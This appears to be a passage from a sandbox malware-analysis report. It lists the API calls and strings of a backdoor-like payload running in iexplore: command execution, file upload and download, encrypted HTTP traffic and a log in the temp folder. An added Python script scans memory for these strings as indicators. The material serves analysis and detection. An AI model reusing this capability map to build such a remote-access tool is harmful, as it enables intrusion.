      • Part of subcall function 00515486: strncmp.MSVCRT(?,rundll ,00000007,?,?,00520110,00000294,005153A6,?,00000001,?,?,00000001), ref: 0051555C
      • Part of subcall function 00515486: strstr.MSVCRT ref: 005155DB
      • Part of subcall function 00515486: LoadLibraryA.KERNEL32(?), ref: 005155F9
      • Part of subcall function 00515486: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00520110,00000294,005153A6,?,00000001,?,?,00000001), ref: 0051562D
      • Part of subcall function 00515486: ___swprintf_l.LIBCMT ref: 00515645
      • Part of subcall function 00515486: GetProcAddress.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,?,00520110,00000294,005153A6,?,00000001), ref: 00515664
      • Part of subcall function 00515486: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00520110,00000294,005153A6,?,00000001,?,?,00000001), ref: 00515698
      • Part of subcall function 00515486: ___swprintf_l.LIBCMT ref: 005156F8
      • Part of subcall function 00515486: GetSystemDirectoryA.KERNEL32(?,00000200), ref: 00515736
      • Part of subcall function 00515486: CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 005157B6
      • Part of subcall function 00515486: GetLastError.KERNEL32 ref: 005157C0
      • Part of subcall function 00515486: ___swprintf_l.LIBCMT ref: 00515808
      • Part of subcall function 00515486: memset.MSVCRT ref: 00515831
      • Part of subcall function 00515486: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 00515896
      • Part of subcall function 00515486: WaitForSingleObject.KERNEL32(?,?), ref: 005158BD
      • Part of subcall function 00515486: PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 005158F4
      • Part of subcall function 00515486: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00515922
      • Part of subcall function 00515486: WaitForSingleObject.KERNEL32(?,000003E8), ref: 0051594B
      • Part of subcall function 00515486: memset.MSVCRT ref: 00515964
      • Part of subcall function 00515486: CloseHandle.KERNEL32(?), ref: 0051597A
      • Part of subcall function 00515486: CloseHandle.KERNEL32(?), ref: 00515982
      • Part of subcall function 00515486: CloseHandle.KERNEL32(?), ref: 00515992
      • Part of subcall function 00515486: CloseHandle.KERNEL32(?), ref: 0051599A
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7B5
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7F0
    • ??3@YAXPAX@Z.MSVCRT ref: 00515463
      • Part of subcall function 00513455: MultiByteToWideChar.KERNEL32(00000000,00000000,0000C6FF,000000FF,00000000,00000000,00000008,?,0000C6FF,?,?,?,005153ED,0000C6FF,00000000), ref: 0051346E
      • Part of subcall function 00513455: ??_U@YAPAXI@Z.MSVCRT ref: 00513484
      • Part of subcall function 00513455: MultiByteToWideChar.KERNEL32(00000000,00000000,0000C6FF,000000FF,00000000,00000001,?,?,?,005153ED,0000C6FF,00000000), ref: 005134A1
      • Part of subcall function 00513455: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,005153ED,0000C6FF,00000000), ref: 005134B8
      • Part of subcall function 00513455: ??_U@YAPAXI@Z.MSVCRT ref: 005134BE
      • Part of subcall function 00513455: memset.MSVCRT ref: 005134C9
      • Part of subcall function 00513455: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,0000C6FF,00000001,00000000,00000000,?,005153ED,0000C6FF,00000000), ref: 005134E2
      • Part of subcall function 00513455: ??_V@YAXPAX@Z.MSVCRT ref: 005134F5
      • Part of subcall function 00513455: ??_V@YAXPAX@Z.MSVCRT ref: 005134FD
      • Part of subcall function 0051476E: rand.MSVCRT ref: 0051479C
      • Part of subcall function 0051476E: ??2@YAPAXI@Z.MSVCRT ref: 005147B4
      • Part of subcall function 0051476E: ??3@YAXPAX@Z.MSVCRT ref: 0051481E
      • Part of subcall function 0051476E: ??3@YAXPAX@Z.MSVCRT ref: 00514862
    • ??3@YAXPAX@Z.MSVCRT ref: 00515453
    • ??3@YAXPAX@Z.MSVCRT ref: 0051545C
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    Strings
    • Send Command Result Data Failed!, xrefs: 00515435
    • Recv CommandList Format Error!, xrefs: 00515471
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
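The string tables in the function blocks above (the upload routine's "open upload file error!", "Read Upload File Size Error!", "Read Upload File Error!", "Send OP_UPLOAD_START Data Failed!" and "Send OP_UPLOAD_DATA Data Failed!", and the command dispatcher's "Recv CommandList Format Error!", "Send Command Result Data Failed!" and its "runexe " / "rundll " command prefixes), together with the "Client Start!" log line and the debug log name FXSAPIDebugLogFile.tmp written under %TEMP%, are usable as memory and disk indicators for this payload. The block below is an added example, not part of the Joe Sandbox report or of the sample: it scans a byte buffer for those strings in both ASCII and UTF-16LE, records the offsets, and applies a minimum-distinct-hits threshold so that a single generic token such as "rundll " does not match on its own. The sample buffer is constructed inline; the page only fixes the encoding where the API is explicitly ANSI (strncmp, CreateFileA), so both forms are searched everywhere.

```python
import re
from typing import Dict, List, Tuple

# Indicator strings as they appear in the HCA string tables and API
# arguments above. The " - %d" format suffixes are dropped so the fixed
# prefix matches regardless of the formatted error code.
INDICATORS = [
    "open upload file error!",
    "Read Upload File Size Error!",
    "Read Upload File Error!",
    "Send OP_UPLOAD_START Data Failed!",
    "Send OP_UPLOAD_DATA Data Failed!",
    "Recv CommandList Format Error!",
    "Send Command Result Data Failed!",
    "Client Start!",
    "FXSAPIDebugLogFile.tmp",
    "runexe ",
    "rundll ",
]

Hit = Tuple[str, int]  # (encoding, byte offset)


def _encodings(s: str) -> List[Tuple[str, bytes]]:
    # Search both narrow and wide forms: the report does not state the
    # encoding except where the API is explicitly ANSI.
    return [("ascii", s.encode("ascii")), ("utf-16le", s.encode("utf-16-le"))]


def scan_buffer(data: bytes) -> Dict[str, List[Hit]]:
    """Return {indicator: [(encoding, offset), ...]} for every occurrence."""
    hits: Dict[str, List[Hit]] = {}
    for s in INDICATORS:
        for enc, pat in _encodings(s):
            for m in re.finditer(re.escape(pat), data):
                hits.setdefault(s, []).append((enc, m.start()))
    return hits


def is_match(hits: Dict[str, List[Hit]], min_distinct: int = 3) -> bool:
    """Require several distinct indicators before calling it a match."""
    return len(hits) >= min_distinct


def build_sample() -> bytes:
    """Constructed test buffer: filler bytes with a few indicators embedded
    in both encodings. Not a dump taken from the analysed sample."""
    filler = bytes(range(256)) * 4  # 1024 bytes, contains no indicator substring
    return (
        filler
        + b"Send OP_UPLOAD_DATA Data Failed!\x00"
        + filler
        + "Recv CommandList Format Error!".encode("utf-16-le") + b"\x00\x00"
        + filler
        + b"runexe "
        + b"C:\\Users\\user\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.tmp\x00"
        + filler
    )


if __name__ == "__main__":
    found = scan_buffer(build_sample())
    for name, locs in found.items():
        print(f"{name!r}: {locs}")
    print("match" if is_match(found) else "no match")
```

To use it against the report's own artefact, read the `.sdmp` memory dump (or a carved PE) into `data` and call `scan_buffer(data)`; offsets are relative to the start of the buffer, so add the dump's base (00510000 here) to map a hit back to the addresses in the listing.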
    APIs
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    • WinHttpOpen.WINHTTP(00000000,00000001,00000000,00000000,00000000,?,?,00000000), ref: 00511C12
    • memset.MSVCRT ref: 00511C38
    • memset.MSVCRT ref: 00511C56
      • Part of subcall function 00511231: RegQueryValueExW.ADVAPI32(00000000,AutoConfigURL,00000000,00000000,00000400,00000400,?,00000000), ref: 00511257
      • Part of subcall function 00511231: RegCloseKey.ADVAPI32(00000000), ref: 00511260
    • memset.MSVCRT ref: 00511C90
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000020,?,00000020,?,?,?), ref: 00511CA3
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051A9D3
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051AA1C
      • Part of subcall function 0051A93E: _errno.MSVCRT ref: 0051A956
      • Part of subcall function 0051A93E: _errno.MSVCRT ref: 0051A9AD
    • WinHttpGetProxyForUrl.WINHTTP(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00511D33
    • WinHttpSetOption.WINHTTP(?,00000026,00000003,0000000C,?,?,?,?,?,?,?,?,?), ref: 00511D57
    • GlobalFree.KERNEL32(?), ref: 00511D71
    • GlobalFree.KERNEL32(?), ref: 00511D81
      • Part of subcall function 005121E5: memset.MSVCRT ref: 00512208
      • Part of subcall function 005121E5: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000020,?,00000020,?,?,00000000), ref: 0051221B
      • Part of subcall function 005121E5: wcsstr.MSVCRT ref: 0051222A
      • Part of subcall function 005121E5: _wtoi.MSVCRT ref: 0051223B
      • Part of subcall function 005121E5: WinHttpConnect.WINHTTP(?,?,00000050,00000000,?,?,00000000), ref: 00512277
      • Part of subcall function 005121E5: GetLastError.KERNEL32(?,?,00000000), ref: 00512284
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • Sleep.KERNEL32(000003E8), ref: 0051B035
    • InterlockedCompareExchange.KERNEL32(00523E44,?,00000000), ref: 0051B03F
    • _amsg_exit.MSVCRT ref: 0051B05C
    • __initterm_e.LIBCMT ref: 0051B077
    • _initterm.MSVCRT ref: 0051B090
    • InterlockedExchange.KERNEL32(00523E44,00000000), ref: 0051B0A6
    • Sleep.KERNEL32(000003E8), ref: 0051B0DD
    • InterlockedCompareExchange.KERNEL32(00523E44,00000001,00000000), ref: 0051B0E8
    • _amsg_exit.MSVCRT ref: 0051B0FA
    • free.MSVCRT(00472EE0), ref: 0051B127
    • InterlockedExchange.KERNEL32(00523E44,00000000), ref: 0051B149
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • WinHttpQueryDataAvailable.WINHTTP(?,00000000,?,00000000,?,?), ref: 005140C4
    • GetLastError.KERNEL32 ref: 005140CE
      • Part of subcall function 0051336C: WinHttpReadData.WINHTTP(?,?,?,?,?,?,?,0051410A,?,00000000,00000004), ref: 0051338C
      • Part of subcall function 0051336C: GetLastError.KERNEL32(?,?,0051410A,?,00000000,00000004), ref: 005133A6
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    • ??2@YAPAXI@Z.MSVCRT ref: 00514130
    • ??2@YAPAXI@Z.MSVCRT ref: 00514156
      • Part of subcall function 005191BC: ??2@YAPAXI@Z.MSVCRT ref: 00519203
      • Part of subcall function 005191BC: memset.MSVCRT ref: 00519224
      • Part of subcall function 005191BC: memcpy.MSVCRT ref: 0051923B
      • Part of subcall function 005191BC: memcpy.MSVCRT ref: 00519297
      • Part of subcall function 005191BC: ??3@YAXPAX@Z.MSVCRT ref: 005192B2
    • ??3@YAXPAX@Z.MSVCRT ref: 00514181
    • ??3@YAXPAX@Z.MSVCRT ref: 00514188
    • ??3@YAXPAX@Z.MSVCRT ref: 0051419B
      • Part of subcall function 0051A476: _errno.MSVCRT ref: 0051A48F
      • Part of subcall function 0051A476: memcpy.MSVCRT ref: 0051A4BB
      • Part of subcall function 0051A476: memset.MSVCRT ref: 0051A4CC
      • Part of subcall function 0051A476: _errno.MSVCRT ref: 0051A4DE
    • ??3@YAXPAX@Z.MSVCRT ref: 005141C7
    • ??3@YAXPAX@Z.MSVCRT ref: 005141E2
    Strings
    • WinHttpQueryDataAvailable Failed! - %d, xrefs: 005140D5
    • Recv Data Length : %d., xrefs: 00514123
    • AES Decrypt Received Data Fail!, xrefs: 0051418D
    • Receive Data length Not Correct!, xrefs: 005141D4
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • memset.MSVCRT ref: 00515CFB
      • Part of subcall function 0051350A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000200,?,?,00000000,005152D8,00000000,?), ref: 00513524
      • Part of subcall function 0051350A: ??_U@YAPAXI@Z.MSVCRT ref: 0051353A
      • Part of subcall function 0051350A: memset.MSVCRT ref: 00513547
      • Part of subcall function 0051350A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000001,00000000,005152D8,00000000,?), ref: 0051355D
      • Part of subcall function 0051350A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00513568
      • Part of subcall function 0051350A: ??_U@YAPAXI@Z.MSVCRT ref: 00513572
      • Part of subcall function 0051350A: memset.MSVCRT ref: 0051357C
      • Part of subcall function 0051350A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000), ref: 0051358D
      • Part of subcall function 0051350A: ??_V@YAXPAX@Z.MSVCRT ref: 005135A2
      • Part of subcall function 0051350A: ??_V@YAXPAX@Z.MSVCRT ref: 005135A8
    • ??2@YAPAXI@Z.MSVCRT ref: 00515D57
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000000,00000000), ref: 00515D82
    • CloseHandle.KERNEL32(00000000), ref: 00515D8E
    • memcpy.MSVCRT ref: 00515DA4
    • GetLastError.KERNEL32(?,?,?,?,00000000,000003EB,?,?,?,?,?,00000000), ref: 00515DD1
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
      • Part of subcall function 0051A476: _errno.MSVCRT ref: 0051A48F
      • Part of subcall function 0051A476: memcpy.MSVCRT ref: 0051A4BB
      • Part of subcall function 0051A476: memset.MSVCRT ref: 0051A4CC
      • Part of subcall function 0051A476: _errno.MSVCRT ref: 0051A4DE
      • Part of subcall function 0051476E: rand.MSVCRT ref: 0051479C
      • Part of subcall function 0051476E: ??2@YAPAXI@Z.MSVCRT ref: 005147B4
      • Part of subcall function 0051476E: ??3@YAXPAX@Z.MSVCRT ref: 0051481E
      • Part of subcall function 0051476E: ??3@YAXPAX@Z.MSVCRT ref: 00514862
    • ??3@YAXPAX@Z.MSVCRT ref: 00515E78
    Strings
    • CreateFile Error! - %d, xrefs: 00515DDA
    • Send OP_DOWNLOAD_END Data Failed!, xrefs: 00515E5C
    • Send OP_DOWNLOAD_START Data Failed!, xrefs: 00515DC7
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • rand.MSVCRT ref: 00512725
    • memset.MSVCRT ref: 0051274A
    • rand.MSVCRT ref: 0051275D
      • Part of subcall function 005122D3: memset.MSVCRT ref: 00512330
      • Part of subcall function 005122D3: memset.MSVCRT ref: 0051235A
      • Part of subcall function 005122D3: rand.MSVCRT ref: 00512375
      • Part of subcall function 005122D3: ___swprintf_l.LIBCMT ref: 0051238F
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051A9D3
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051AA1C
    • rand.MSVCRT ref: 0051279E
    • rand.MSVCRT ref: 005127C3
      • Part of subcall function 0051A93E: _errno.MSVCRT ref: 0051A956
      • Part of subcall function 0051A93E: _errno.MSVCRT ref: 0051A9AD
    • ___swprintf_l.LIBCMT ref: 005127ED
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • Sleep.KERNEL32(000003E8), ref: 004F388F
    • InterlockedCompareExchange.KERNEL32(0050264C,?,00000000), ref: 004F3899
    • _amsg_exit.MSVCRT ref: 004F38B6
    • __initterm_e.LIBCMT ref: 004F38D1
    • _initterm.MSVCRT ref: 004F38EA
    • InterlockedExchange.KERNEL32(0050264C,00000000), ref: 004F3900
    • Sleep.KERNEL32(000003E8), ref: 004F3937
    • InterlockedCompareExchange.KERNEL32(0050264C,00000001,00000000), ref: 004F3942
    • _amsg_exit.MSVCRT ref: 004F3954
    • free.MSVCRT(00832388), ref: 004F3981
    • InterlockedExchange.KERNEL32(0050264C,00000000), ref: 004F39A3
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    APIs
    • memset.MSVCRT ref: 0051115A
    • RegEnumKeyW.ADVAPI32(80000003,00000000,?,00000104), ref: 0051117D
    • wcsncmp.MSVCRT(S-1-5-21,?,00000008), ref: 00511199
    • wcsstr.MSVCRT ref: 005111B1
    • memset.MSVCRT ref: 005111CF
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051A9D3
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051AA1C
      • Part of subcall function 0051A93E: _errno.MSVCRT ref: 0051A956
      • Part of subcall function 0051A93E: _errno.MSVCRT ref: 0051A9AD
    • RegOpenKeyExW.ADVAPI32(80000003,?,00000000,00020019,?), ref: 00511206
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    • S-1-5-21, xrefs: 00511194
    • \Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 005111E5
    • Classes, xrefs: 005111AB
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 00515EBD
    • Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 00515ED0
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 00515EE6
    • SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,?,?,?,?,00000000), ref: 00515F1C
    • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00515F2E
    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00515F38
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00515F50
    • CloseHandle.KERNEL32(000000FF), ref: 00515F6D
      • Part of subcall function 00515F93: ??2@YAPAXI@Z.MSVCRT ref: 00515FA9
      • Part of subcall function 00515F93: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00515FC9
      • Part of subcall function 00515F93: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00515F8B), ref: 00515FE0
      • Part of subcall function 00515F93: CloseHandle.KERNEL32(00515F8B), ref: 00515FEC
      • Part of subcall function 00515F93: memcpy.MSVCRT ref: 0051603E
      • Part of subcall function 00515F93: memcpy.MSVCRT ref: 00516052
      • Part of subcall function 00515F93: ??3@YAXPAX@Z.MSVCRT ref: 00516087
    Strings
    • Write Download File Error!, xrefs: 00515F43
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • memset.MSVCRT ref: 00512330
    • memset.MSVCRT ref: 0051235A
    • rand.MSVCRT ref: 00512375
    • ___swprintf_l.LIBCMT ref: 0051238F
      • Part of subcall function 0051A93E: _errno.MSVCRT ref: 0051A956
      • Part of subcall function 0051A93E: _errno.MSVCRT ref: 0051A9AD
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    • 0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 005122FF
    • abcdefghijklmnopqrstuvwxyz, xrefs: 00512314
    • ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 005122F8
    • 0123456789, xrefs: 00512306
    • ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 0051230D
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • memset.MSVCRT ref: 00514D3A
      • Part of subcall function 0051494C: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0051496C
      • Part of subcall function 0051494C: ReadFile.KERNEL32(00000000,?,00000269,?,00000000), ref: 00514993
      • Part of subcall function 0051494C: CloseHandle.KERNEL32(00000000), ref: 0051499A
      • Part of subcall function 0051494C: ??2@YAPAXI@Z.MSVCRT ref: 005149A7
      • Part of subcall function 0051494C: ??3@YAXPAX@Z.MSVCRT ref: 005149CD
    • GetLastError.KERNEL32(00000001,?,00000000), ref: 00514D50
    • memcpy.MSVCRT ref: 00514DBE
    • memcpy.MSVCRT ref: 00514E2D
    • memcpy.MSVCRT ref: 00514E87
    • memcpy.MSVCRT ref: 00514ED7
      • Part of subcall function 0051476E: rand.MSVCRT ref: 0051479C
      • Part of subcall function 0051476E: ??2@YAPAXI@Z.MSVCRT ref: 005147B4
      • Part of subcall function 0051476E: ??3@YAXPAX@Z.MSVCRT ref: 0051481E
      • Part of subcall function 0051476E: ??3@YAXPAX@Z.MSVCRT ref: 00514862
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000200,?,?,00000000,005152D8,00000000,?), ref: 00513524
    • ??_U@YAPAXI@Z.MSVCRT ref: 0051353A
    • memset.MSVCRT ref: 00513547
    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000001,00000000,005152D8,00000000,?), ref: 0051355D
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00513568
